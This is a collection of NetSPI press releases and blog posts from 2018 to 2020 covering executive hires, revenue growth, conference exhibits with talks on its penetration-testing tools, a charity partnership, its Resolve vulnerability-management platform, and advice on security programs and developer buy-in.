NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact
Tori Norris
Maccabee on behalf of NetSPI
Email: tori@maccabee.com
Phone: (612) 294-3100

January 21, 2020
Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.

Minneapolis, Minnesota – NetSPI, a leader in enterprise security testing and vulnerability management, has added Nabil Hannan as Managing Director, where he will work with NetSPI clients on strategic security solutions incorporating both technology and services.

“NetSPI’s innovative technology and services are essential for any high performing security program,” said Aaron Shilts, NetSPI President and COO. “Strategically, we continue to strive to be at the leading edge of this industry, providing valuable, actionable guidance to our clients, and Nabil adds to our ability to do this. He will consult directly with our clients and advise them on how to solve their most critical cyber security challenges in 2020 and beyond.”

Hannan comes to NetSPI with a deep background in building and improving effective software security initiatives, with expertise in the financial services sector. Most notably, in his 13 years of experience in cyber security consulting, he held a position at Cigital/Synopsys Software Integrity Group, where he identified, scoped, and delivered on software security projects, including architectural risk analysis, penetration testing, secure code review, malicious code detection, vulnerability remediation, and mobile security assessments. Hannan has also worked as a Product Manager at Research In Motion/BlackBerry and has managed several flagship initiatives and projects through the full software development life cycle.

“Cyber security is more critical today than ever before. We’ve all seen news of breaches in the headlines and may have even been affected by these breaches personally,” said Nabil Hannan, NetSPI Managing Director. “I look forward to advising NetSPI’s prestigious client base and helping companies protect their organizations, strategic assets, and valuable intellectual property. My role will also support NetSPI’s vision to help organizations build and maintain strong threat and vulnerability management programs – leveraging both technology and human capital.”

Learn more about NetSPI’s Advisory Services at https://netspi.com/services/strategic-advisory/ or connect with Nabil on Twitter or LinkedIn.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep-dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.

Media Contact

Tori Norris, Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100

Post title: NetSPI Adds Seasoned Security Expert Nabil Hannan to Its Team
Permalink: https://www.netspi.com/?post_type=news&p=16211 (last modified 2021-04-14)

Post published 2020-01-14 (ID 15848):

Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs. No matter what stage you’re in with developing your program, keep these three best practices in mind today to set your team and company up for success tomorrow.

Scalability First

Build scalability into every strategy and program. Ask yourself “Will this scale?” at every step. It’s very easy to paint yourself into a corner by focusing on a tactical solution when a security alert or emergency occurs, so take a minute to stop and think about whether your solution is going to scale if it is implemented company-wide. If your “solution” is not scalable, you may end up with two or three times the work and expense later, so try to quantify the lifetime impact of your decision upfront.

Another scalability-related tip is to plan to be successful from the outset. Choose scalable tools and processes, supported by flexible staffing, to help manage growth efficiently.

Be Flexible

Find a balance between repeatability and consistency on one hand and flexibility and agile ingenuity on the other. Some processes need to be rigid and consistent, while others can be more freeform. In the past, we’ve tried to engineer a process to enforce a set of constraints only to learn that it did not really matter or mitigate risk. In the security community we tend to look for ways to make processes repeatable and remove their dynamics, but by doing so, we sometimes lose the intended purpose of the activity. It’s more art than science, but finding a balance between flexibility and rigidity is important.

Plan for Communication and Collaboration

Many problems can be traced back to miscommunication and misunderstanding of what is usually a technical topic by people who do not have technical expertise. As such, planning for communication and collaboration in the early stages of building out your program is critical.

Keep in mind that people interpret words differently. Scan, assessment, risk, and vulnerability mean different things to different people, and this has resulted in miscommunication and differing expectations. Take a step back to clearly define those terms and ensure everyone is on the same page.

Post title: Three Things To Remember When Building Your InfoSec Program
Permalink: https://www.netspi.com/?p=15848 (last modified 2021-04-14)

Post published 2019-07-31 (ID 13214):

Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2019, Aug. 7-8 (booth #105) in Las Vegas, NV. NetSPI will present and exhibit at the conference to showcase vulnerability management and penetration testing solutions that improve an organization’s information security posture. NetSPI’s security experts will provide best practices and insights during their presentations and will also be available to meet 1:1. Schedule a session now.

Presentations at NetSPI Booth #105

Attacking Modern Environments through SQL Server with PowerUpSQL

When: Wednesday, August 7 at 10:30 a.m., 1:00 p.m., and 4:30 p.m.; Thursday, August 8 at 11:00 a.m.
Where: NetSPI Booth #105
Presenter: Scott Sutherland
Session Summary: PowerUpSQL provides insight into the risks that misconfigured SQL Servers pose to enterprise environments. See how PowerUpSQL can be used to perform SQL Server discovery, weak configuration auditing, privilege escalation at scale, and post-exploitation actions such as Active Directory recon and OS command execution. We’ll share an msbuild script that can be used to launch an offensive SQL Server shell with data exfiltration capabilities. Get PowerUpSQL at https://github.com/NetSPI/PowerUpSQL/wiki

Attacking Azure Environments with MicroBurst

When: Wednesday, August 7 at 11:00 a.m., 1:30 p.m., and 5:00 p.m.; Thursday, August 8 at 10:30 a.m.
Where: NetSPI Booth #105
Presenter: Karl Fosaaen
Session Summary: Azure tenant misconfigurations are extremely common. See how MicroBurst can be used to perform service discovery, weak configuration auditing, privilege escalation, and other post-exploitation actions such as password recovery and OS command execution. Get a preview of an update to MicroBurst. Get MicroBurst at https://github.com/NetSPI/MicroBurst

Inveigh New Release Review

When: Wednesday, August 7 at 11:30 a.m., 2:00 p.m., and 5:30 p.m.; Thursday, August 8 at 11:30 a.m.
Where: NetSPI Booth #105
Presenter: Kevin Robertson
Session Summary: Learn about the new 1.5 release of Inveigh, a Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer and man-in-the-middle tool. Plus, we’ll delve into the first non-development release of InveighZero, the C# version of Inveigh. See new features, differences, and Windows post-exploitation use cases for both tools. Get Inveigh at https://github.com/Kevin-Robertson/Inveigh

Learn more at NetSPI Booth #105

In addition to the presentations, attendees will have the opportunity to learn more about the following:

Application and Infrastructure Security Testing Services

See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides:
  • Application Penetration Testing Services
  • Network Penetration Testing Services
  • Cloud Infrastructure Penetration Testing Services
  • NetSPI Resolve™ Threat and Vulnerability Management Software
  • Security Program Transformation Services
NetSPI’s penetration testing services cover everything from mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include threat and vulnerability management assessments, and attack simulation services that encompass red team, social engineering, detective controls testing, and more.

NetSPI Resolve™ Vulnerability Management and Orchestration Software

Many companies run multiple vulnerability scanners, but making sense of the data, plus manual penetration testing reports and remediation status from across a global enterprise, is a massive manual effort. Resolve™ correlates all vulnerability data across your organization into a single view, so you can find, prioritize, and fix vulnerabilities faster. With data integration, Resolve™ can also show the remediation status of identified vulnerabilities. This results in vulnerability management processes that scale for global organizations. Learn how NetSPI Resolve™ removes the risk of managing vulnerabilities in spreadsheets, and the arduous administrative tasks that cause inefficiencies. NetSPI Resolve™ reduces your risk while increasing your security testing coverage by more than fifty percent without adding additional staff.

Schedule a Security Advisory Session with NetSPI

Sign up for a one-on-one security advisory session or a software demo at Black Hat USA 2019.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes penetration testing services, vulnerability management software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn.

Post title: NetSPI to Present and Exhibit at Black Hat USA 2019 Information Security Conference
Permalink: https://www.netspi.com/?post_type=netspi_news&p=13214 (last modified 2021-04-14)

Post published 2019-03-26 (ID 13210):

Minneapolis, Minnesota – NetSPI LLC, the leading provider of application and network security testing solutions, announced today it achieved a 50% year-over-year revenue increase in 2018 as it continued to expand its product lineup, staff, clients, and office locations.
“In 2018, NetSPI evolved into a high performance, high growth security company,” said President and Chief Operating Officer, Aaron Shilts. “We achieved significant growth driven from our top accounts, adding new clients, and taking market share from competitors in the penetration testing space.”

In a mature market that is growing less than 10% per year, NetSPI is growing at more than five times that rate due to the increased efficiency and accuracy of its Resolve™ platform. To manage this rapid growth, NetSPI strengthened its senior management team with the addition of two industry veterans, Chief Financial Officer, Jeni Bahr, and Chief Information Security Officer, Bill Carver. The company also added more staff, bringing the total to over 100 employees in Q4 2018. To accommodate a larger workforce the company completed significant renovations to its Minneapolis corporate headquarters and opened its first office in the Pacific Northwest, a region that delivered significant revenue in 2018. Last year also marked the first full year of operation for the company’s Dallas office, ground zero for new product development.

Due to the efforts of the development team, NetSPI rolled out a number of new offerings in 2018. These included a complete rebuild of the company’s flagship Resolve™ software platform as well as new offerings spanning test and vulnerability management, cloud security, and mainframe testing. “With the launch of these new capabilities we were able to move beyond tactical penetration testing and vulnerability assessments to offer more strategic services,” said Shilts. “Looking forward, I expect us to increasingly help leading companies define and then build their security programs.”

Last year NetSPI also increased its thought leadership activities and ramped up customer communication with the launch of the Our Thinking blog and hosted its first customer advisory board at The Biltmore in Asheville, NC. This new annual event brings together some of NetSPI’s largest customers to help set current and future product direction, prioritize new product capabilities, and gain insights into current challenges and markets. The company also hosted its largest class size ever at NetSPI University, more than doubling the number of students compared to 2017. “Attracting and retaining qualified talent is the number one challenge for cybersecurity leaders today, so NetSPI doubled down on our rigorous training program, helping develop the next generation of penetration testing experts,” said Shilts.

Looking forward, NetSPI expects another strong year of growth in 2019 with increasing revenue as a result of bringing the new Resolve™ 7 platform to market as well as continued account and geographic expansion.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes security testing services, vulnerability orchestration software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn.

Post title: NetSPI Announces 50% Year-Over-Year Revenue Growth And Rapid Expansion
Permalink: https://www.netspi.com/?post_type=netspi_news&p=13210 (last modified 2021-04-14)

Post published 2019-02-19 (ID 13208):

Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at RSA Conference 2019 (Booth 4400, North Expo) in San Francisco, March 4-8, 2019.
NetSPI will showcase its cybersecurity testing services and the NetSPI Resolve™ vulnerability management and orchestration platform, which help organizations scale and operationalize threat and vulnerability management programs. At RSA, NetSPI’s security experts will provide complimentary one-on-one sessions with attendees upon request to discuss the attendees’ security needs and to share best practices and insights for security and compliance. Attendees are encouraged to connect with NetSPI at RSA. NetSPI will also participate in the Expo Pub Crawl at RSA on Wednesday, March 6, 4:30 – 6:00 p.m.

More about NetSPI’s services and solutions to be exhibited at RSA:
  • Application & Infrastructure Security Testing Services: See how NetSPI’s security testing services are designed to address bandwidth, expertise gaps, and compliance needs. NetSPI provides penetration testing services for everything from mobile and web apps to cloud, network, mainframe, IoT, and more. Additional strategic services include threat and vulnerability management assessments, and attack simulation services for red team, social engineering, detective controls testing, and more.
  • NetSPI Resolve™ Vulnerability Orchestration Software: See how NetSPI Resolve™ enables the orchestration of cyber security efforts across an entire organization to shorten the vulnerability management life cycle and improve the organization’s security posture. Businesses are flooded by vulnerability data that is often managed with manual and time-consuming processes. Resolve™ brings order to this chaos by helping customers fix vulnerabilities faster – and provides the insight they need to triage and prioritize remediation efforts to focus cybersecurity resources and reduce risk.

Post title: NetSPI to Exhibit at RSA Conference 2019
Permalink: https://www.netspi.com/?post_type=netspi_news&p=13208 (last modified 2021-04-14)

Post published 2019-01-30 (ID 13206):

Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, has announced the launch of NetSPI Resolve™, an end-to-end solution for vulnerability management and orchestration. Companies face a growing number of vulnerabilities, leaving them at risk for data breaches that are expensive and damaging to their reputation.
Resolve™ enables the orchestration of cyber security efforts across an entire organization, so businesses can shorten the vulnerability management life cycle and improve their security posture.

“Businesses are flooded by vulnerability data from scanners and pentesters, but all that information doesn’t add up to a coherent picture. Data piles up from multiple security testing sources, and there is no consistent way to track or prioritize vulnerabilities. It’s a manual and time-consuming process to try to make sense of your risk exposure, let alone track and report on it,” said Deke George, NetSPI CEO. “Resolve™ essentially brings order to this chaos. Not only does it help customers fix vulnerabilities faster – but it also gives them the insight they need to triage and prioritize remediation efforts, so they can focus their resources on the most critical issues and continuously reduce their risk.”

The number of disclosed vulnerabilities has increased each year. In an attempt to find them all, many organizations use multiple scanners along with in-house or third-party manual penetration testing, generating a large amount of overlapping data. Resolve™ automatically correlates this disparate data into a single system of record, allowing organizations to coordinate security teams’ efforts, track remediation progress, and report on vulnerabilities across teams and departments. The result is improved visibility of vulnerabilities, faster time to remediation, and reduced exposure to risk.

“There aren’t enough cyber security professionals – the unemployment rate for cyber security professionals is about zero,” George said. “The only way organizations can close critical security gaps is by automating and orchestrating security tasks to reduce manual overhead, so they can get more done without more employees or longer hours. We’re excited to offer customers a solution to some of their biggest cyber security challenges.”

NetSPI, which also offers pentesting and vulnerability management services, initially developed the platform to support execution and delivery of services to its customers. The platform was designed to ingest and correlate vulnerabilities from disparate sources, standardize the vulnerability knowledge base and remediation recommendations, ensure consistency in pentest execution and resulting outcomes, and track and report progress with actionable information to prioritize resources. NetSPI Resolve™ offers the same capabilities to customers’ internal security teams, as a cloud-based solution that can scale to handle tens of millions of vulnerabilities.

NetSPI Resolve™ will be showcased at a series of happy hour events during the last two weeks of March in Minneapolis, New York City, Atlanta, Seattle, Dallas, and Toronto. To register or learn more, visit Resolve™.

Post title: NetSPI Launches New Vulnerability Management and Orchestration Platform
Post excerpt: NetSPI Resolve™ automatically correlates vulnerability data from any source into a single view for the whole organization so you can prioritize and fix vulnerabilities faster, and continuously reduce your risk exposure.
Permalink: https://www.netspi.com/?post_type=netspi_news&p=13206 (last modified 2021-04-14)

Post published 2019-01-24 (ID 13202):

Minneapolis, Minnesota – NetSPI LLC, the leading provider of threat and vulnerability orchestration and security testing, announced today it will partner with University of Minnesota Masonic Children’s Hospital as part of a new philanthropic program called “NetSPI Gives.”

“While NetSPI continues to see business growth both nationally and globally, we haven’t forgotten about giving back to our local community,” said Vice President of People Operations, Meghan Hermann.

As a leading high-tech, research-focused cybersecurity company, NetSPI could immediately relate to the groundbreaking research going on at University of Minnesota Masonic Children’s Hospital. In particular, the hospital’s pediatric cancer advancements struck a chord. “We were so excited to connect with the team at the hospital and knew immediately that we needed to make a big contribution,” said Hermann. “All 110 of our employees from across the country will be together in Minneapolis this week where we will kick off the partnership with the hospital.”

To manage all of the company’s philanthropic activities so they can make the biggest impact possible, it decided to create a program called NetSPI Gives. As part of the new program, the company plans to donate time and money as part of a charitable initiative each quarter.
“Our physician-scientists are pursuing new avenues of research to develop powerful alternatives that are even safer and more effective treatments for childhood cancers,” said Nick Engbloom, Director of Community Partnerships for University of Minnesota Masonic Children’s Hospital. “We are excited to partner with NetSPI’s volunteer and philanthropic efforts, which will play an essential role in elevating the impact on pediatric cancer research here.”

“Our employees are always motivated by opportunities to give back to our community and are thrilled to be making a significant and lasting impact on children at the hospital,” said Hermann. “We’re excited about this important step in NetSPI’s growth and look forward to continuing to make a difference in the local community.”

Currently, plans are underway for a number of fundraising and charitable events at the hospital involving NetSPI staff. For more information and announcements, follow NetSPI on Facebook, Twitter, and LinkedIn.

About University of Minnesota Masonic Children's Hospital

University of Minnesota Masonic Children's Hospital brings hope and healing to children and families by caring for one child at a time, while advancing education, research, and innovation on behalf of all children. By working as one health care team centered on its youngest patients, University of Minnesota Masonic Children’s Hospital and pediatric clinics create exceptional care experiences for children and their families in Minnesota and around the world.

Media Contacts

Krystle Barbour, Media and Public Relations Specialist, M Health, +1.612.626.2767

Post title: NetSPI Partners with University of Minnesota Masonic Children’s Hospital as Part of New Philanthropic Program
Permalink: https://www.netspi.com/?post_type=netspi_news&p=13202 (last modified 2021-04-14)

Post published 2019-01-12 (ID 13212):

Minneapolis, Minnesota – NetSPI LLC, the leader in vulnerability management tools and penetration testing services, has released the NetSPI Resolve™ vulnerability management integration framework.
The data integration tool allows financial, healthcare, retail, technology, and other businesses to automate time-consuming manual processes and improve vulnerability management.

More than 20,000 new software vulnerabilities are identified annually. Cyber-attackers use these vulnerabilities to breach networks, websites, and applications – and steal sensitive data. Many companies run multiple vulnerability scanners in an effort to find and fix vulnerabilities before attackers exploit them. Unfortunately, each vulnerability scanner uses its own data format and definitions. Making sense of the scanner data, manual penetration testing reports, and remediation status from across a global enterprise is a massive manual effort.

The NetSPI Resolve™ vulnerability management and orchestration platform makes sense of the data from all these sources and makes a risk-based assessment to identify the most critical vulnerabilities to prioritize for remediation. With data integration, Resolve™ can also show the remediation status of identified vulnerabilities – whether their status is open, in remediation, or risk-accepted. The result is a vulnerability management process that scales for global organizations.

The NetSPI Resolve™ vulnerability management integration framework enables companies to:
  • Save time with automated data flows. The visual integration framework lets users automate the bidirectional flow and mapping of disparate data – quickly and easily – while maintaining the performance of existing vulnerability management workflows.
  • Connect popular tools with out-of-the-box integrations. The integration framework supports the most popular application scanners, network scanners, ticketing, remediation, and governance tools, including AppScan, Qualys, Jira, Archer, and more.
  • Build custom data integrations. Users can build their own integrations for other tools using Java, JavaScript, Ruby, Python, or Jython.
  • Get data from structured and unstructured sources. The integration framework can connect Resolve™ to enterprise data sources, such as corporate databases and Active Directory. In addition, Resolve™ can ingest data from semi-structured and unstructured data sources, such as penetration testing reports.
  • Push data out to other systems. Users can send notifications when vulnerabilities reach a threshold and push vulnerability data to remediation ticketing systems and governance, risk, and compliance (GRC) systems.

Join NetSPI at the Gartner Security & Risk Management Summit

The Resolve™ integration framework will be demonstrated publicly for the first time in Booth 1017 at the Gartner Security & Risk Management Summit, June 17-20 in National Harbor, MD. Attendees can request a private demo, or attend the vulnerability management panel, Best practices for updating your vulnerability management program, on Tuesday, June 18 at 1:15 p.m. Learn more about Resolve™ here.

About the Gartner Security & Risk Management Summit 2019

The Gartner Security & Risk Management Summit 2019 features programs focusing on key topics such as business continuity management, cloud security, privacy, securing the Internet of Things (IoT), and the chief information security officer (CISO) role. Gartner analysts will explain the latest information on new threats to enable digital business in a world of escalating risk.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that supports organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes penetration testing services, vulnerability management software platform, and advisory services. Trusted by seven of the top 10 United States banks, the largest global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. To learn why the world’s top brands trust NetSPI, visit netspi.com or follow us on Facebook, Twitter, and LinkedIn.

Make it Easy on the Development Team
Published 2019-01-04

Software development teams are often at odds with application security teams, specifically pentesting teams. In this post we explore why this happens and what five steps you can take to improve participation in security testing by the development team in your organization.

Conflicting Objectives

At a macro view, the objectives of software development and application security align. Organizations need software and security to operate. But at the micro level, each team has very different objectives that don’t align.

Development teams are measured on delivering functional code on time and on budget, yet development teams regularly struggle to meet release deadlines. There are various reasons as to why, some avoidable and some not. Common reasons include scope creep, scope underestimation, unforeseen roadblocks, and bad planning.

The application security team is at least partially measured on how many vulnerabilities they find. If they don’t find vulnerabilities, that means the development team did a good job, but the security team has a hard time justifying the value they provide. Security teams scrutinize applications deeply because their reputation depends on what they can find. More often than not, they succeed in doing their jobs. The vulnerabilities they find have to be fixed.

The application security testing (AST) process further increases the deadline pressure experienced by development teams. Fixing vulnerabilities takes time and delays code pushes. The outcome is a double whammy. First, the development team’s ability to deliver on time is put in jeopardy. Second, the developers feel as though their own reputations have been tarnished if their code is found to have flaws.

It’s no wonder development teams often chafe, drag their feet, or otherwise hinder the application security testing process. They submit to testing because it’s required, but they are generally not willing participants.

Evaluating Possible Solutions

Rational arguments for application security are already well understood by developers. Training and explanations do nothing to align the conflicting objectives and outcome of application security testing. Reasoning and rationale can only increase willingness so much.

Some organizations try to bake security into the software development lifecycle (SDLC). Time is allocated for application security testing between the release date and the production target. As development projects slip, security is often the first thing to be pushed out so the deadline can be met. Development teams would rather get all the features in and risk an unknown number of security flaws, hoping none exist. This reasoning leads back to the conflicting objectives.

Automation built in during the SDLC to help catch problems early can reduce the findings during a pentest. There is a diminishing return, though. More scanners will not eliminate all of the vulnerabilities found during a pentest. And this does not solve the conflicting objectives.

Five Steps to Buy-in

The best security solutions are also the most convenient. Security is often viewed as a necessary evil by those burdened by the requirements. Reducing the effort needed is the best way to improve buy-in and willingness.

Application security testing orchestration (ASTO) delivers on convenience in many ways:

Step 1

Test scheduling should be as simple as possible. Ideally it should be possible to allow self-service for development teams to view, filter, and schedule security testing slots based on the availability of application security testing resources. This approach reduces the human effort needed to coordinate and schedule tests.

Software delivery dates often slip. Rescheduling pentesting at the last minute can cause a great deal of disruption to the security team. In this case, a backlog of scheduled tests can provide a buffer. For the backlog to work, scoping information for scheduled tests must be ready well ahead of time.

Step 2

Make the process of scoping security testing as seamless and convenient as possible. Your application security testing orchestration tool should track the application scope information on an ongoing basis. Annual application security tests should allow for development stakeholders to carry over prior information. Stakeholders should review and revise it prior to testing, but it’s much easier to revise than to write the entire form again.

Passing a Word document back and forth with comments and track changes gets messy and is hard to manage. Scoping questionnaires should be collaborative web interfaces where security and development can both participate. After the development team has submitted revised scoping information, the security team should review it quickly and verify it from a queue.

If any errors or discrepancies are found, communication should be easy to follow and track. Comments and markup on the scoping form are an ideal way to enable the communication flow. The web form can be mapped into a database in a standardized way and used in automated processes, which is something a Word document cannot do.

Step 3

Vulnerabilities will be found during testing. Providing full context of how to fix the vulnerabilities with high-quality remediation instructions can save the developers much time. Avoid making the developers work to figure out how to fix the problem by providing a remediation instructions library with vetted content. Sure, pentesters can write instructions, but consistency and quality will come from a standard library.

Step 4

Developers work in their own tools. Giving them a laundry list .CSV file of vulnerabilities or a static report is not going to make it easy for them. Don’t make them load the list into their tool or force them to track on a spreadsheet. Manual processes risk losing track of vulnerabilities and increasing developers’ workloads.

Integrate directly with the development SCRUM tool. Push vulnerabilities into developers’ existing workflow with the included remediation instructions to save them time and effort. Having a bidirectional sync with the SCRUM tool also makes it much easier to track remediation.

Step 5

Retesting and verifying that vulnerabilities have been fixed should be expedient and as automated as possible. Waiting to retest for weeks or months after a developer has fixed the problem will only increase the frustration the developers feel. Some scanners can automatically verify a vulnerability has been fixed, which can be triggered based on an application security testing orchestration process. Adding retest tasks to a queue for the application security team and having a service level agreement (SLA) on the task will also ensure that the security team is following up on the fix in a timely fashion.

Conclusion

While it may not be possible to entirely remove the conflict between application security and software development, it’s certainly possible to ease the inconvenience. Development teams understand the need for security. The experience is generally the problem. Improve the user experience for your developers, just like you would for any customer, and you will have a much easier time getting buy-in for the application security testing process.

NetSPI Names Bill Carver as New Chief Information Security Officer
Published 2018-12-03

Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, has named Bill Carver as the company’s first Chief Information Security Officer (CISO). As NetSPI’s top security officer, Carver will do for NetSPI what we already do for our clients: ensure our data, communications, systems, assets, and vulnerability orchestration solutions are secure. Additionally, Carver will leverage his experience managing diverse and complex cybersecurity strategies to safeguard both NetSPI and its global customers from new types of attacks and vulnerabilities.

“As an organization, we are committed to being a leader in information security and protection. By creating this role, we are demonstrating that security is embedded in every aspect of our business, from IT architecture and software development to operations, policies, and procedures,” said Aaron Shilts, President and COO. “And Bill is perfect for the role. His passion for helping organizations improve their security posture will benefit not only NetSPI, but our clients as well.”

Carver, previously NetSPI’s practice director for advisory services, has more than two decades of information security experience. Prior to joining NetSPI, he helped establish consulting services capabilities at Optiv and FishNet Security, focusing on the evaluation and improvement of information security programs. He has also held information security roles at Merck and CitiFinancial.

“In today’s globally connected society, cybersecurity is more critical than ever. I am thrilled to contribute to NetSPI’s vision both in leading our internal cybersecurity efforts as well as providing strategic direction to help support our clients’ threat and vulnerability management programs,” Carver said.

About NetSPI

NetSPI LLC is the leading provider of application and network security testing solutions that support organizations in scaling and operationalizing their threat and vulnerability management programs. The solution portfolio includes program development, security testing, and a software platform for application and infrastructure vulnerability orchestration. Trusted by seven of the top 10 United States banks, two global cloud providers, and many of the Fortune® 500, NetSPI has deep expertise in financial institutions, healthcare providers, retailers, and technology companies. NetSPI is headquartered in Minneapolis, Minnesota with additional offices in Dallas, Denver, Portland, and New York. For more information about NetSPI, please visit netspi.com.

Five Signs Your Application Security Assessment Process Needs a Reboot
Published 2018-11-16

Many organizations use manually intensive processes when onboarding their application security assessments. Compare the following process with your own experience:

  • Schedule the application security assessment.
  • Assign internal/external penetration testers to conduct the test.
  • Conduct the application security assessment and/or vulnerability scan.
  • Report application vulnerabilities to the remediation team by copying and pasting from various systems.
  • Report multiple duplicates and false positives that had been verified previously.

With a process like the one above, your organization will struggle with delayed timelines and duplicate efforts. And because the process is manual, each step in your lifecycle is prone to human error. In highly regulated industries, this wasteful approach consumes valuable resources, when resources are already lacking.

Ask the following five questions to assess the strength of your organization’s vulnerability management program:

  • Does your organization have multiple ways for application owners to request application assessments?
  • Do you struggle to scope the assessment properly? For example, can you acquire details such as how dynamic pages are within your web app, the number of user roles, the application’s code language, etc.?
  • Do you have to follow-up with the application owners for more information or direction after the scoping questionnaires are emailed to the pentesting team?
  • After receiving completed questionnaires, do you send login credentials via email to conduct authenticated application security tests?
  • Do you email the pentesting team a copy of the concluded assessment results, regardless of the type of test: static application security testing (SAST), dynamic application security testing (DAST) or a manual penetration test?

If you rely on email and manual processes like these for your vulnerability management program, it is probably time for a vulnerability management program overhaul!

Reduce Your Administrative Overhead by 40% to 60%

Even without the headache of sifting through duplicate findings and incurring delays, we have found that organizations can spend from 6 to 10 hours onboarding applications into the vulnerability assessment process. Organizations we’ve interviewed say this massive administrative overhead is reduced by 40%-60% with NetSPI Resolve™, the first commercially available security testing automation and vulnerability correlation software platform.

NetSPI Resolve reduces the time required to identify and remediate vulnerabilities, providing pentesters and their teams with comprehensive automated reporting, ticketing, and SLA management. By utilizing these Resolve features, along with the automation of questionnaire publication, organizations achieve streamlined communication and can complete vulnerability assessments faster, without sacrificing the quality of assessment results.

By reducing – and in some cases, even eliminating – the time needed for administrative tasks, pentesters are able to focus more on what they do best: test.

Data Silos: Are They Really a Problem?
Published 2018-10-31

Data silos happen naturally for many reasons. As an organization grows and their security maturity evolves, they’ll likely end up with one or more of these scenarios.

Using multiple security testing scanners: As the security landscape evolves, so does the need for security testing tools, including SAST and DAST/IAST tools, network perimeter tools, internal or third-party penetration testing, and adversarial attack simulation. Companies that were once functioning with one SAST, DAST and network tool each will begin to add others to the toolkit, possibly along with additional pentesting companies and ticketing and/or GRC platforms.

Tracking remediation across multiple tools: One business unit’s development team could be on a single instance of JIRA, for example, while another business unit is using a separate instance, or even using a completely different ticketing system.

What Problems Do Data Silos Create in a Security Testing Environment?

Data silos can create several problems in a security testing environment. Two common challenges we see are duplicate vulnerabilities and false positives.

Let’s take a look at each one:

Duplicate vulnerabilities: This happens so easily. You’re using a SAST and a DAST tool for scanners. Your SAST and DAST tools both report an XSS vulnerability on the same asset, so your team receives multiple tickets for the same issue. Or, let’s say you run a perimeter scan and PCI penetration test on the same IP range as your vulnerability management team. Both report the same missing patch, and your organization receives duplicate tickets for remediation. If this only happened once, no big deal. But when scaled to multiple sites and thousands of vulnerabilities identified, duplicate vulnerabilities create significant excess labor for already busy remediation teams. The result: contention across departments and slower remediation.

False positives: False positives create extra work, can cause teams to feel they’re chasing ghosts, and reduce confidence in security testing reports. Couple them with duplicate vulnerabilities, and the problems multiply. For example, say your security team reports a vulnerability from their SAST tool. The development team researches it and provides verification information as to why this vulnerability is a false positive. The security team marks it as a false positive, and everyone moves on. Then your security team runs their DAST tool. The same vulnerability is found and reported to the development team who then does the same research and provides the same information as to why this same vulnerability is still a false positive. Now you have extra work as well as the possibility of animosity between security and development teams.

Why Do These Problems Happen—And How Can You Stop It?

The answer that many security scanners offer is a walled garden solution, or closed platforms. In other words, these security tools cannot ingest vulnerabilities outside of their solution suite. This approach may benefit the security solution vendor, but it hamstrings your security teams. Organizations reliant on these platforms are unable to select among best-in-breed security tools for specific purposes, or they risk losing a single, coherent view of their vulnerabilities enterprise wide.

NetSPI recommends finding a vulnerability orchestration platform provider that can ensure choice while still delivering a single source of record for all vulnerabilities. Using a platform that can automatically aggregate, normalize, correlate and prioritize vulnerabilities allows organizations to retain the agility to test emerging technologies using commercially owned, open source, or even home-grown security tools. Not only will this minimize the challenges caused by data silos, but it can allow security teams to get more testing done, more quickly.

When we built NetSPI Resolve™, our own vulnerability orchestration platform, we built it to eliminate walled gardens. The development of the platform began almost twenty years ago and is the first commercially available security testing automation and vulnerability correlation software platform that empowers you to reduce the time required to identify and remediate vulnerabilities. As a technology-enabled service provider, we didn’t want to limit our testers to specific tools. NetSPI Resolve empowers our testers to choose the best tools and technology. More than that, because NetSPI Resolve can ingest and integrate data from multiple tools, it also provides our testers with comprehensive, automated reporting, ticketing, and SLA management. By reducing or eliminating the time for these kinds of tasks, NetSPI Resolve allows testers to do what they do best – test.

